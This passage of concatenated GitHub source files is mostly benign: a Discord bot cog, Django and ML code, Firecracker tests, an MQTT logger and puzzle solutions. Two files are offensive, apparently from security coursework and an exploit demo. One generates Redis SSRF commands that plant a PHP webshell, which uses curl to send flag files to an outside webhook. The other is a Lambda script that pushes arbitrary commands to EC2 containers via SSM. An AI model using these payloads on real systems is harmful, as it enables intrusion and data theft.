`{0} ms `'.format(round(self.bot.latency * 1000))\n        dev_version = \"V3.0: Dev-006\"\n        live_version = \"V2.3\"\n\n        embed = discord.Embed(title='Bot information', color = discord.Color.green())\n        embed.set_author(name=watermark[\"Watermark\"])\n        embed.add_field(name=\"**Discord version:**\", value= discord_version, inline=False)\n        embed.add_field(name=\"**Python version:**\", value=platform.python_version(), inline=False)\n        embed.add_field(name=\"**Bot Dev Version:**\", value=dev_version, inline=False)\n        embed.add_field(name=\"Live bot version:\", value=live_version, inline=False)\n        embed.add_field(name=\"**Total guilds:**\", value=total_guilds, inline=False)\n        embed.add_field(name=\"**Total members:**\", value=total_members, inline=False)\n        embed.add_field(name=\"**Latency:**\", value=ping, inline=False)\n\n        try:\n            await ctx.send(embed = embed)\n        except HTTPException as e:\n            await ctx.send(f\"Python version: {python_version}\\nDiscord Version: {discord_version}\\nTotal Guilds: {total_guilds}\\nTotal members: {total_members}\")\n\n\n\n    @commands.command(name='av')\n    async def av(self, ctx, member : discord.Member = None):\n        if member is not None:\n            await ctx.send(member.avatar_url)\n        else:\n            await ctx.send(ctx.author.avatar_url)\n\n\n    @commands.command(name='whois')\n    async def whois(self, ctx, member : discord.Member = None):\n        # both branches built the same embed, so default to the author and build it once\n        if member is None:\n            member = ctx.author\n        embed = discord.Embed(title='User information.', color = discord.Color.green())\n        date_format = \"%a, %d %b %Y %I:%M %p\"\n        embed.set_author(name=member.display_name, url = member.avatar_url)\n        embed.set_thumbnail(url = member.avatar_url)\n        embed.add_field(name=\"Joined at:\", value= member.joined_at.strftime(date_format))\n        members = sorted(ctx.guild.members, key=lambda m: m.joined_at)\n        embed.add_field(name=\"Join position\", value=str(members.index(member) +1 ))\n        embed.add_field(name=\"Registered at:\", value=member.created_at.strftime(date_format))\n\n        if len(member.roles) > 1:\n            role_string = ' '.join([r.mention for r in member.roles][1:])\n            embed.add_field(name=\"Roles [{}]\".format(len(member.roles) -1 ), value=role_string, inline=False)\n        else:\n            embed.add_field(name=\"Roles:\", value=\"None\")\n        return await ctx.send(embed=embed)\n\n\n\ndef setup(bot):\n    bot.add_cog(botinfo(bot))\n\n","repo_name":"SenpaiDesi/Vandals-Bot","sub_path":"moderation/botinfo.py","file_name":"botinfo.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8825877874","text":"from 
django.contrib.auth.models import Group\n\nfrom api.admin_users.models import AdminUser\nfrom api.admin_users.selectors.select_reviewers import \\\n    select_random_reviewer_by_group\nfrom api.capital_calls.models import FundCapitalCall\nfrom api.funds.models import Fund\nfrom api.users.constants import CAPITAL_CALL_REVIEWER\nfrom api.workflows.models import Task, WorkFlow\n\n\nclass CreateCapitalCallTask:\n    def __init__(self, fund: Fund, capital_call: FundCapitalCall, admin_user: AdminUser):\n        self.fund = fund\n        self.capital_call = capital_call\n        self.admin_user = admin_user\n\n    def create_workflow_task(self):\n        name = 'Capital-Call-review'\n        workflow = WorkFlow.objects.create(\n            name=f'{name}-workflow',\n            fund=self.fund,\n            company=self.fund.company,\n            created_by=self.admin_user,\n            workflow_type=WorkFlow.WorkFlowTypeChoices.REVIEW.value,\n            module=WorkFlow.WorkFlowModuleChoices.CAPITAL_CALL.value\n        )\n\n        self.capital_call.workflow = workflow\n        self.capital_call.save()\n\n        reviewer = select_random_reviewer_by_group(company=self.fund.company, group_name=CAPITAL_CALL_REVIEWER)\n        group = Group.objects.filter(name=CAPITAL_CALL_REVIEWER).first()\n        Task.objects.create(\n            workflow=workflow,\n            assigned_to=reviewer,\n            assigned_to_group=group,\n            task_type=Task.TaskTypeChoice.REVIEW_REQUEST.value,\n            name=f'{name}-task',\n            status=Task.StatusChoice.PENDING.value\n        )\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/capital_calls/services/create_capital_call_task.py","file_name":"create_capital_call_task.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34487092521","text":"from transformers import BertModel, BertTokenizer\nfrom tokenizers import BertWordPieceTokenizer\nimport torch\nimport torch.nn as nn\nimport string\n\nclass config:\n    MAX_LEN = 128\n    TOKENIZER = BertWordPieceTokenizer('/home/koushik/Documents/Pretrained Models/bert-base-uncased/vocab.txt')\n    BERT_PATH = '/home/koushik/Documents/Pretrained Models/bert-base-uncased'\n\nclass BERTBaseUncased(nn.Module):\n    def __init__(self):\n        super(BERTBaseUncased, self).__init__()\n        self.bert = BertModel.from_pretrained(config.BERT_PATH)\n        self.l0 = nn.Linear(768, 2)\n\n    def forward(self, ids, mask, token_type_ids):\n        sequence_output, pooled_output = self.bert(\n            ids,\n            attention_mask = mask,\n            token_type_ids = token_type_ids\n        )\n        logits = self.l0(sequence_output)\n        start_logits, end_logits = logits.split(1, dim=-1)\n        start_logits = start_logits.squeeze(-1)\n        end_logits = end_logits.squeeze(-1)\n        return start_logits, end_logits\n\nmodel = BERTBaseUncased()\nmodel = nn.DataParallel(model)\nmodel.load_state_dict(torch.load('sentiment_extraction/bert model/model.bin'))\nmodel.eval()\n\ndef predict(tweet, sentiment, max_len=config.MAX_LEN, tokenizer=config.TOKENIZER):\n    tweet = (\" \".join(str(tweet).split())).strip()  # collapse runs of whitespace\n    \n    if sentiment == \"neutral\" or len(tweet.split()) < 4:\n        return tweet\n\n    encoded_tweet = tokenizer.encode(tweet)\n    tweet_tokens = encoded_tweet.tokens\n    tweet_ids = encoded_tweet.ids\n    mask = [1] * len(tweet_ids)\n    token_type_ids = [0] * len(tweet_ids)\n\n    padding_len = max_len - len(tweet_ids)\n    ids = tweet_ids + [0] * padding_len\n    mask = mask + [0] * padding_len\n    token_type_ids = token_type_ids + [0] * padding_len\n\n    ids = torch.tensor([ids], dtype=torch.long)\n    mask = torch.tensor([mask], dtype=torch.long)\n    token_type_ids = torch.tensor([token_type_ids], dtype=torch.long)\n\n    start, end = 
model(ids, mask, token_type_ids)\n    start = start.cpu().view(-1)[1:-(padding_len+1)]\n    end = end.cpu().view(-1)[1:-(padding_len+1)]\n\n    _, idx_start = start.max(0)\n    _, idx_end = end.max(0)\n\n    output = \"\"\n    tweet_tokens = tweet_tokens[1: -1]\n    for i in range(idx_start, idx_end+1):\n        if tweet_tokens[i] in ('[CLS]', '[SEP]'):\n            continue\n        elif tweet_tokens[i].startswith(\"##\"):\n            output += tweet_tokens[i][2:]\n        elif len(tweet_tokens[i])==1 and tweet_tokens[i] in string.punctuation:\n            output += tweet_tokens[i]\n        else:\n            output += (\" \"+tweet_tokens[i])\n    if len(output) == 0:\n        output = tweet\n    return output.strip()","repo_name":"KoushikSahu/sentiment-extraction-webapp","sub_path":"src/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22342767478","text":"import platform\nimport tempfile\n\nimport pytest\nfrom test_balloon import _test_rss_memory_lower\n\nimport host_tools.drive as drive_tools\nfrom framework.microvm import SnapshotType\nfrom framework.properties import global_props\n\n# Define 4 scratch drives.\nscratch_drives = [\"vdb\", \"vdc\", \"vdd\", \"vde\"]\n\n\ndef test_restore_old_to_current(\n    microvm_factory, guest_kernel, rootfs_ubuntu_22, firecracker_release\n):\n    \"\"\"\n    Restore snapshots from previous supported versions of Firecracker.\n\n    For each firecracker release:\n    1. Snapshot with the past release\n    2. Restore with the current build\n    \"\"\"\n\n    # due to bug fixed in commit 8dab78b\n    firecracker_version = firecracker_release.version_tuple\n    if global_props.instance == \"m6a.metal\" and firecracker_version < (1, 3, 3):\n        pytest.skip(\"incompatible with AMD and Firecracker <1.3.3\")\n\n    # Microvm: 2vCPU 256MB RAM, balloon, 4 disks and 4 net devices.\n    diff_snapshots = True\n    vm = microvm_factory.build(\n        guest_kernel,\n        rootfs_ubuntu_22,\n        fc_binary_path=firecracker_release.path,\n        jailer_binary_path=firecracker_release.jailer,\n    )\n    vm.spawn()\n    vm.basic_config(track_dirty_pages=True)\n    snapshot = create_snapshot_helper(\n        vm,\n        drives=scratch_drives,\n        diff_snapshots=diff_snapshots,\n        balloon=diff_snapshots,\n    )\n    vm = microvm_factory.build()\n    vm.spawn()\n    vm.restore_from_snapshot(snapshot, resume=True)\n    validate_all_devices(vm, diff_snapshots)\n    print(vm.log_data)\n\n\ndef test_restore_current_to_old(microvm_factory, uvm_plain, firecracker_release):\n    \"\"\"\n    Restore current snapshot with previous versions of Firecracker.\n\n    For each firecracker release:\n    1. Snapshot with the current build\n    2. 
Restore with the past release\n \"\"\"\n\n # Microvm: 2vCPU 256MB RAM, balloon, 4 disks and 4 net devices.\n vm = uvm_plain\n vm.spawn()\n vm.basic_config(track_dirty_pages=True)\n\n # Create a snapshot with current FC version targeting the old version.\n snapshot = create_snapshot_helper(\n vm,\n target_version=firecracker_release.snapshot_version,\n drives=scratch_drives,\n balloon=True,\n diff_snapshots=True,\n )\n\n # Resume microvm using FC/Jailer binary artifacts.\n vm = microvm_factory.build(\n fc_binary_path=firecracker_release.path,\n jailer_binary_path=firecracker_release.jailer,\n )\n vm.spawn()\n vm.restore_from_snapshot(snapshot, resume=True)\n validate_all_devices(vm, True)\n print(\"========== Firecracker restore snapshot log ==========\")\n print(vm.log_data)\n\n\n@pytest.mark.skipif(platform.machine() != \"x86_64\", reason=\"TSC is x86_64 specific.\")\ndef test_save_tsc_old_version(uvm_nano):\n \"\"\"\n Test TSC warning message when saving old snapshot.\n \"\"\"\n uvm_nano.start()\n uvm_nano.snapshot_full(target_version=\"0.24.0\")\n uvm_nano.check_log_message(\"Saving to older snapshot version, TSC freq\")\n\n\ndef validate_all_devices(microvm, balloon):\n \"\"\"Perform a basic validation for all devices of a microvm.\"\"\"\n # Test that net devices have connectivity after restore.\n for iface in microvm.iface.values():\n print(\"Testing net device\", iface[\"iface\"].dev_name)\n microvm.guest_ip = iface[\"iface\"].guest_ip\n exit_code, _, _ = microvm.ssh.run(\"sync\")\n\n # Drop page cache.\n # Ensure further reads are going to be served from emulation layer.\n cmd = \"sync; echo 1 > /proc/sys/vm/drop_caches\"\n exit_code, _, _ = microvm.ssh.run(cmd)\n assert exit_code == 0\n\n # Validate checksum of /dev/vdX/test.\n # Should be ab893875d697a3145af5eed5309bee26 for 10 pages\n # of zeroes.\n for drive in list(microvm.disks)[1:]:\n # Mount block device.\n print(\"Testing drive \", drive)\n cmd = f\"mkdir -p /tmp/{drive} ; mount /dev/{drive} /tmp/{drive}\"\n exit_code, _, _ = microvm.ssh.run(cmd)\n assert exit_code == 0\n\n # Validate checksum.\n cmd = f\"md5sum /tmp/{drive}/test | cut -d ' ' -f 1\"\n exit_code, stdout, _ = microvm.ssh.run(cmd)\n assert exit_code == 0\n assert stdout.strip() == \"ab893875d697a3145af5eed5309bee26\"\n print(\"* checksum OK.\")\n\n if balloon is True:\n print(\"Testing balloon memory reclaim.\")\n # Call helper fn from balloon integration tests.\n _test_rss_memory_lower(microvm)\n\n\ndef create_snapshot_helper(\n vm,\n target_version=None,\n drives=None,\n balloon=False,\n diff_snapshots=False,\n):\n \"\"\"Create a snapshot with many devices.\"\"\"\n if diff_snapshots is False:\n snapshot_type = SnapshotType.FULL\n else:\n # Version 0.24 and greater has Diff and balloon support.\n snapshot_type = SnapshotType.DIFF\n\n if balloon:\n # Add a memory balloon with stats enabled.\n vm.api.balloon.put(\n amount_mib=0, deflate_on_oom=True, stats_polling_interval_s=1\n )\n\n test_drives = [] if drives is None else drives\n\n # Add disks.\n for scratch in test_drives:\n # Add a scratch 64MB RW non-root block device.\n scratchdisk = drive_tools.FilesystemFile(tempfile.mktemp(), size=64)\n vm.add_drive(scratch, scratchdisk.path)\n\n # Workaround FilesystemFile destructor removal of file.\n scratchdisk.path = None\n\n for _ in range(4):\n vm.add_net_iface()\n\n vm.start()\n\n # Iterate and validate connectivity on all ifaces after boot.\n for i in range(4):\n exit_code, _, _ = vm.ssh_iface(i).run(\"sync\")\n assert exit_code == 0\n\n # Mount scratch drives 
in guest.\n    for blk in test_drives:\n        # Create mount point and mount each device.\n        cmd = f\"mkdir -p /tmp/mnt/{blk} && mount /dev/{blk} /tmp/mnt/{blk}\"\n        exit_code, _, _ = vm.ssh.run(cmd)\n        assert exit_code == 0\n\n        # Create file using dd using O_DIRECT.\n        # After resume we will compute md5sum on these files.\n        dd = f\"dd if=/dev/zero of=/tmp/mnt/{blk}/test bs=4096 count=10 oflag=direct\"\n        exit_code, _, _ = vm.ssh.run(dd)\n        assert exit_code == 0\n\n        # Unmount the device.\n        cmd = f\"umount /dev/{blk}\"\n        exit_code, _, _ = vm.ssh.run(cmd)\n        assert exit_code == 0\n\n    snapshot = vm.make_snapshot(snapshot_type, target_version=target_version)\n    print(\"========== Firecracker create snapshot log ==========\")\n    print(vm.log_data)\n    vm.kill()\n    return snapshot\n","repo_name":"firecracker-microvm/firecracker","sub_path":"tests/integration_tests/functional/test_snapshot_advanced.py","file_name":"test_snapshot_advanced.py","file_ext":"py","file_size_in_byte":6431,"program_lang":"python","lang":"en","doc_type":"code","stars":22949,"dataset":"github-code","pt":"53"} +{"seq_id":"74103192807","text":"import os, sys\nimport time\nimport logging\nimport yaml\nimport json\nimport psycopg2\n\nlogging.basicConfig(level=logging.INFO, format=' %(asctime)s - %(levelname)s - %(message)s')\n\n\ndef on_disconnect(client, userdata, rc):\n    logging.info(\"MQTT Client Got Disconnected\")\n\ndef on_connect(client, userdata, flags, rc):\n    logging.info(\"MQTT Connected With Result Code \"+str(rc))\n    logging.info(\"MQTT Subscribing to topic: \" + cfg['mqtt']['topic'])\n    client.subscribe(cfg['mqtt']['topic'])\n\ndef on_log(client, userdata, level, buf):\n    logging.debug(\"log: \" + str(buf))\n\ndef on_message(client, userdata, message):\n    logging.debug(\"message received :\" + str(message.payload.decode()))\n    #logging.debug(\"message topic=\",message.topic)\n    #logging.debug(\"message qos=\",message.qos)\n    #logging.debug(\"message retain flag=\",message.retain)\n    global errorcount\n    data = json.loads(message.payload.decode())\n    logging.debug(\"JSON:\" + str(data))\n    timestamp = data[\"datetime\"]\n    temp = data[\"koi_temperature\"]\n    sql = \"\"\"INSERT into fishtanksensordata (measurement_timestamp,temperature_degf) values (%s,%s)\"\"\"\n    logging.info(\"Wrote Message - Timestamp:\" + str(timestamp) + \", Data: \" + str(temp) + \", errorcount:\" + str(errorcount))\n    try:\n        cursor.execute(sql, (timestamp, temp))\n        conn.commit()\n        errorcount = 0\n    except (Exception, psycopg2.DatabaseError) as error:\n        print(error)\n        print(\"SQL statement:\" + sql)\n        print(\"Data: \" + str(temp))\n        #conn.rollback()\n        errorcount = errorcount + 1\n        if (errorcount > 5):\n            sys.exit()\n\ndef writePidFile():\n    pid = str(os.getpid())\n    currentFile = open('/tmp/writepostgres.pid', 'w')\n    currentFile.write(pid)\n    currentFile.close()\n\nerrorcount = 0\n\nwith open(\"config.yml\", 'r') as ymlfile:\n    cfg = yaml.safe_load(ymlfile)\n\nlogging.info(\"Connecting to Postgres as: \" + cfg['postgres']['user'] )\n\ntry:\n    connect_str = \"dbname='\"+ cfg['postgres']['dbname'] +\"' user='\"+ cfg['postgres']['user'] +\"' \" + \\\n                  \"host='\"+ cfg['postgres']['host'] +\"' password='\"+ cfg['postgres']['password'] +\"'\"\n    # use our connection values to establish a connection\n    conn = psycopg2.connect(connect_str)\n\n    # create a psycopg2 cursor that can execute queries\n    cursor = conn.cursor()\n\nexcept Exception as e:\n    print(\"Uh oh, can't connect. 
Invalid dbname, user or password?\")\n    print(e)\n    sys.exit()\n\nwritePidFile()\nlogging.info(\"MQTT Setup - Host: \" + cfg['mqtt']['host'] + \", Topic: \" + cfg['mqtt']['topic'] )\n\n# MQTT Client setup:\nif cfg['mqtt']['enabled']:\n    import paho.mqtt.client as mqtt\n\n    # clean_session = True. clean_session is a Boolean value set to True by default. If set to True, the broker removes all the information about the client during disconnection & reconnection. If set to False the broker will retain the subscription information & queued messages during disconnection & reconnection.\n    client = mqtt.Client(\"writepostgres\", clean_session=True) #create new instance\n\n    # attach functions to callback\n    # client.on_log=on_log #useful for debug\n    client.on_message = on_message\n    client.on_connect = on_connect\n    client.on_disconnect = on_disconnect\n\n    client.connect(cfg['mqtt']['host']) #connect to broker\n\n    client.loop_forever() # only loop when MQTT is enabled, otherwise client is undefined\n","repo_name":"kmkingsbury/pi-fishtank-sensors","sub_path":"writepostgres.py","file_name":"writepostgres.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14368345805","text":"from pywinauto.application import Application\n\napp = Application().Start(cmd_line=u'\"C:\\\\Program Files (x86)\\\\Notepad++\\\\notepad++.exe\" ')\nnotepad = app[u'Notepad++']\nnotepad.Wait('ready')\nmenu_item = notepad.MenuItem(u'&?->\u95dc\u65bc Notepad++...\tF1')\nmenu_item.Click()\n\napp.notepad.Edit.TypeKeys(\"1\\thello,hello\\rwahaha\")\n# app.Kill_()\n","repo_name":"kimlin20011/UI-test","sub_path":"pwa_test1/start_nodepadAndhelp.py","file_name":"start_nodepadAndhelp.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17683975238","text":"file = open(\"8december.txt\",\"r\")\nlines = file.readlines()\n\ndef solve():\n    result = 0\n    map = []\n    #create 2d array\n    for line in lines:\n        listOfChar = list(line.strip())\n        listOfChar = ([int(x) for x in listOfChar])\n        map.append(listOfChar)\n    #run through 2d array\n    for i in range(len(map)):\n        for j in range(len(map[i])):\n            #multiply the four viewing distances into a scenic score and keep the best one\n            views = getViews(map, j, i)\n            score = 0\n            if views:\n                score = 1\n                for distance in views:\n                    score *= distance\n            result = max(result, score)\n    print(result)\n\ndef getViews(map,x,y):\n    # viewing distances in order: top, right, bottom, 
left; returns [] when the tree is on an edge\n    result = [1,1,1,1]\n    if x == 0 or y == 0 or x == len(map[y])-1 or y == len(map)-1:\n        return []\n    #get biggest top\n    top = True\n    for ys in range(y-1,-1,-1):\n        if map[ys][x] < map[y][x] and top and ys-1 > 0:\n            result[0] += 1\n        else:\n            top = False\n    #get biggest bottom\n    bottom = True\n    for ys in range(y+1,len(map)):\n        if map[ys][x] < map[y][x] and bottom and ys+1 < len(map):\n            result[2] += 1\n        else:\n            bottom = False\n    #get biggest right\n    right = True\n    for xs in range(x+1,len(map[y])):\n        if map[y][xs] < map[y][x] and right and xs+1 < len(map[y]):\n            result[1] += 1\n        else:\n            right = False\n    #get biggest left\n    left = True\n    for xs in range(x-1,-1,-1):\n        if map[y][xs] < map[y][x] and left and x-xs > 0:\n            result[3] += 1\n        else:\n            left = False\n    return result\n    \ndef treeValid(list, tree):\n    for number in list:\n        if number < tree or number == -1:\n            return 1\n    return 0\n\nsolve()","repo_name":"DanielKoltze/adventofcode","sub_path":"8/8december2.py","file_name":"8december2.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42658820209","text":"\"\"\"\n\nThis script calculates the observation scalars (H matrix) for fusing optical flow\nmeasurements for terrain estimation.\n\n@author: roman\n\"\"\"\n\nfrom sympy import *\n\n# q: quaternion describing rotation from frame 1 to frame 2\n# returns a rotation matrix derived from q which describes the same\n# rotation\ndef quat2Rot(q):\n    q0 = q[0]\n    q1 = q[1]\n    q2 = q[2]\n    q3 = q[3]\n\n    Rot = Matrix([[q0**2 + q1**2 - q2**2 - q3**2, 2*(q1*q2 - q0*q3), 2*(q1*q3 + q0*q2)],\n                  [2*(q1*q2 + q0*q3), q0**2 - q1**2 + q2**2 - q3**2, 2*(q2*q3 - q0*q1)],\n                  [2*(q1*q3-q0*q2), 2*(q2*q3 + q0*q1), q0**2 - q1**2 - q2**2 + q3**2]])\n\n    return Rot\n\n# take an expression calculated by the cse() method and write the expression\n# into a text file in C format\ndef write_simplified(P_tuple, filename, out_name):\n    subs = P_tuple[0]\n    P = Matrix(P_tuple[1])\n    fd = open(filename, 'a')\n\n    is_vector = P.shape[0] == 1 or P.shape[1] == 1\n\n    # write sub expressions\n    for index, item in enumerate(subs):\n        fd.write('float ' + str(item[0]) + ' = ' + str(item[1]) + ';\\n')\n\n    # write actual matrix values\n    fd.write('\\n')\n\n    if not is_vector:\n        iterator = range(int(sqrt(len(P))))\n        for row in iterator:\n            for column in iterator:\n                fd.write(out_name + '(' + str(row) + ',' + str(column) + ') = ' + str(P[row, column]) + ';\\n')\n    else:\n        iterator = range(0, len(P), 1)\n\n        for item in iterator:\n            fd.write(out_name + '(' + str(item) + ') = ' + str(P[item]) + ';\\n')\n\n    fd.write('\\n\\n')\n    fd.close()\n\n########## Symbolic variable definition #######################################\n\n\n# vehicle velocity\nv_x = Symbol(\"v_x\", real=True) # vehicle body x velocity\nv_y = Symbol(\"v_y\", real=True) # vehicle body y velocity\n\n# unit quaternion describing vehicle attitude, qw is real part\nqw = Symbol(\"q0\", real=True)\nqx = Symbol(\"q1\", real=True)\nqy = Symbol(\"q2\", real=True)\nqz = Symbol(\"q3\", real=True)\nq_att = Matrix([qw, qx, qy, qz])\n\n# terrain vertical position in local NED frame\n_terrain_vpos = Symbol(\"_terrain_vpos\", real=True)\n\n_terrain_var = Symbol(\"_terrain_var\", real=True)\n\n# vehicle vertical position in local NED frame\npos_z = Symbol(\"z\", real=True)\n\nR_body_to_earth = quat2Rot(q_att)\n\n# Optical flow around x axis\nflow_x = -v_y / (_terrain_vpos - pos_z) * R_body_to_earth[2,2]\n\n# Calculate observation 
scalar\nH_x = Matrix([flow_x]).jacobian(Matrix([_terrain_vpos]))\n\nH_x_simple = cse(H_x, symbols('t0:30'))\n\n# Optical flow around y axis\nflow_y = v_x / (_terrain_vpos - pos_z) * R_body_to_earth[2,2]\n\n# Calculate observation scalar\nH_y = Matrix([flow_y]).jacobian(Matrix([_terrain_vpos]))\n\nH_y_simple = cse(H_y, symbols('t0:30'))\n\nwrite_simplified(H_x_simple, \"flow_x_observation.txt\", \"Hx\")\nwrite_simplified(H_y_simple, \"flow_y_observation.txt\", \"Hy\")\n\n","repo_name":"PX4/PX4-ECL","sub_path":"EKF/python/terrain_flow_derivation/derive_terrain_flow.py","file_name":"derive_terrain_flow.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":428,"dataset":"github-code","pt":"53"} +{"seq_id":"71677351848","text":"\r\nimport pandas as pd\r\nimport json\r\n\r\n\r\ndef Process_Raw_Inputs(df):\r\n patients = []\r\n for patient_index, pat_data in df.groupby(['IDX', 'IDX_TYPE']):\r\n visits = []\r\n for visit_index, visit_data in pat_data.groupby(['BILLABLE_START_DT']):\r\n inputs = {}\r\n for idx, row in visit_data.iterrows():\r\n inputs[row['CODE_TYPE']] = str(row['CODE_CSV']).split(',')\r\n inputs['DAYS_SINCE_FIRST'] = row['DAYS_SINCE_FIRST']\r\n inputs['DAYS_SINCE_LAST'] = row['DAYS_SINCE_LAST']\r\n visits.append(inputs)\r\n patients.append(visits)\r\n return patients\r\n \r\ndef flatten_visit(visit, code_types): \r\n codes = []\r\n for code_type in code_types:\r\n if code_type in visit.keys():\r\n codes.extend(visit[code_type])\r\n return codes\r\n\r\ndef Combine_Codes(patient_visit_list, code_types):\r\n \"\"\"Combines codes within a visit based on the specified code_types.\r\n Parameters\r\n ----------\r\n patient_visit_list : list, required\r\n a list of of listed dictionaries. Patients and their visits and various code types \r\n within that visit. [[{}, {}], [{}, {}, {}]] \r\n Returns\r\n ------\r\n list of listed lists. 
Patients and their visits' combined codes\r\n \"\"\"\r\n patients = []\r\n for patient in patient_visit_list:\r\n converted_visits = []\r\n for visit in patient:\r\n converted_visits.append(flatten_visit(visit, code_types))\r\n patients.append(converted_visits)\r\n return patients\r\n","repo_name":"claydustin/Clinical-Embeddings","sub_path":"RawDatasets.py","file_name":"RawDatasets.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2235671083","text":"import urllib\nprotocol=\"dict://\"\nip=\"0x7f.0x00.0x00.0x01\"\nport=\"27134\"\nshell=\"\\x3c\\x3f\\x70\\x68\\x70\\x20system\\x28base64_decode\\x28\\x27Y3VybCBodHRwczovL3dlYmhvb2suc2l0ZS9hZmI3NzA1Yi02YmM3LTRkZGEtYjQzNy0yNzY5NDAwYzQ0Y2IvJChiYXNlNjQgLXcwIC9mbGFnKik\\x27\\x29\\x29\\x3b\\x20\\x3f\\x3e\"\nfilename=\"pwn.inc.php\"\npath=\"/tmp\"\npasswd=\"\"\ncmd=[\"flushall\",\n\t \"set 1 \\\"{}\\\"\".format(shell),\n \"config set dir {}\".format(path),\n \"config set dbfilename {}\".format(filename),\n \"save\"\n ]\n\ndef redis_format(arr):\n CRLF=\"\\r\\n\"\n redis_arr = arr.split(\" \")\n cmd=\"\"\n cmd+=\"*\"+str(len(redis_arr))\n for x in redis_arr:\n cmd+=CRLF+\"$\"+str(len((x.replace(\"${IFS}\",\" \"))))+CRLF+x.replace(\"${IFS}\",\" \")\n cmd+=CRLF\n return cmd\n\ndef generate(arr):\n\tfor _ in cmd:\n\t\tpayload=protocol+ip+\":\"+port+\"/\"\n\t\tpayload += _\n\t\tprint(payload)\n\nif __name__==\"__main__\":\n\tgenerate(cmd)\n","repo_name":"Smileyezzz/Program-Security","sub_path":"Web/Homework06/redis_payload.py","file_name":"redis_payload.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23528869073","text":"import boto3\nimport time\n\ndef lambda_handler(event, context):\n remote = event['url']\n cmd = event['cmd']\n inst_detail = \"\"\n server = \"\"\n print(\"[+] Checking if Content-Selectors exist =>\", end=' ')\n try:\n ec2 = boto3.client('ec2')\n\n if remote == \"app.bryceindustries.net\":\n server = \"Shellshock-Docker-PT-Tejas\"\n filters = [{\n 'Name': 'tag:Name',\n 'Values': ['Shellshock-Docker-PT-Tejas']\n }]\n else:\n server = \"Protected-DS-Struts-Docker-tejas\"\n filters = [{\n 'Name': 'tag:Name',\n 'Values': ['Protected-DS-Struts-Docker-tejas']\n }]\n\n reservations = ec2.describe_instances(Filters=filters)\n print(reservations)\n for instances in reservations['Reservations']:\n for instance in instances['Instances']:\n print(instance['InstanceId'])\n inst_detail=instance['InstanceId']\n\n ssm = boto3.client('ssm')\n ssm_document = \"Inter-container-attack\"\n print(\"ssm variable done\")\n cmd_details = ssm.send_command(\n Targets=[\n {\n 'Key': 'tag:Name',\n 'Values': [server]\n }\n ],\n DocumentName=ssm_document,\n Comment='east-west traffic exploit',\n Parameters={\n 'cmd': [\n cmd\n ]\n }\n )\n cmd_id = cmd_details[\"Command\"][\"CommandId\"]\n\n print(cmd_id)\n time.sleep(10)\n output = ssm.get_command_invocation(CommandId=cmd_id, InstanceId=inst_detail)\n print(output)\n print(\"Command executed from vulnerable Container to Victim container\")\n if output['StandardOutputContent'] != \"\":\n var_return = output['StandardOutputContent']\n else:\n var_return = \"Container Exploit Failed with exception!!\"\n\n return var_return\n\n except Exception as e:\n print(\"Exiting... Target is not exploitable\" + str(e))\n\n var_return = \"FAILURE!!! Exploit has failed to execute exploit. 
east west traffic in victim container is protected\"\n return var_return\n\n\n","repo_name":"tsheth/Nexus-exploit-demo","sub_path":"Inter-container-exploit-doc/Lambda-CVE-2014-6271-Exploit.py","file_name":"Lambda-CVE-2014-6271-Exploit.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37752682647","text":"def is_diagonal(lol):\r\n for row in range(len(lol)):\r\n for value in range(len(lol[row])):\r\n if row != value and lol[row][value] != 0:\r\n return False\r\n return True\r\n\r\n\r\n\r\n\r\n\r\ndef is_upper_triangular(lol):\r\n for row in range(1, len(lol)):\r\n for value in range(0, row):\r\n if lol[row][value] != 0:\r\n return False\r\n return True\r\n\r\n \r\n \r\n\r\n\r\n\r\ndef contains(lol, value):\r\n '''for row in range(len(lol)):'''\r\n for row in lol:\r\n for item in row:\r\n if item == value:\r\n return True\r\n return False\r\n\r\n\r\n\r\n\r\n\r\ndef biggest(lol):\r\n biggest_item = []\r\n for row in lol:\r\n for item in row:\r\n biggest_item.append(item)\r\n return max(biggest_item)\r\n\r\n\r\n \r\ndef indices_biggest(lol):\r\n if len(lol) == 1 and len(lol[0]) == 1:\r\n return [0, 0]\r\n big = biggest(lol)\r\n for i in range(len(lol)):\r\n for j in range(len(lol[0])):\r\n if lol[i][j] == big:\r\n return [i, j]\r\n\r\n\r\ndef second_biggest(lol):\r\n return sorted(value for row in lol for value in row)[-2]\r\n\r\n\r\n\r\n\r\n'''def indices_second_biggest():\r\n'''\r\n\r\n\r\n\r\ndef substr_in_values(dictionary, string):\r\n lst = []\r\n\r\n for key in dictionary:\r\n for value in dictionary[key]:\r\n if string.lower() in value.lower():\r\n lst.append(key)\r\n break\r\n return sorted(lst)\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef indices_divisible_by_3(lol):\r\n number_dict = []\r\n for row in range(len(lol)):\r\n for value in range(len(lol[0])):\r\n if (value + row) % 3 == 0:\r\n number_dict.append(lol[row][value])\r\n return number_dict\r\n\r\n\r\n\r\n\r\n\r\ndef sort_int_string(string):\r\n string = string.strip().split()\r\n final_lst = []\r\n\r\n for value in string:\r\n final_lst.append(int(value))\r\n final_lst = sorted(final_lst)\r\n\r\n return_string = \" \"\r\n\r\n for value in 